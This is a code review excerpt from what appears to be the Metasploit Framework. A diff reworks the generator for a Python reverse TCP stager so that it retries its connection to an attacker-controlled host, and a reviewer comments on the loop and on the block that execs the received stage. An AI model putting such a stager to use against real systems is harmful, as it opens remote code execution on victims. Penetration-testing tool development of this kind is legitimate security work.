lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,14 +45,22 @@ def transport_config(opts={})
   def generate_reverse_tcp(opts={})
     # Set up the socket
     cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "import time\n"
+    cmd << "def connect():\n"
+    cmd << "\ttry:\n"
+    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     cmd << py_send_uuid if include_send_uuid
```

Comment:
If you slightly modify the loop structure I referenced in my comment below you could get away without prepending the send uuid code with any white space. The idea would be to only have the socket setup and connect logic to be in the while loop with error handling and break out on a successful socket connection instead of after the `exec` call.

This would have the slight change of only providing the connection itself with the perpetual error handling and not the block that reads and execs the stage. I think this would also more closely emulate the existing stager behavior but I could be wrong.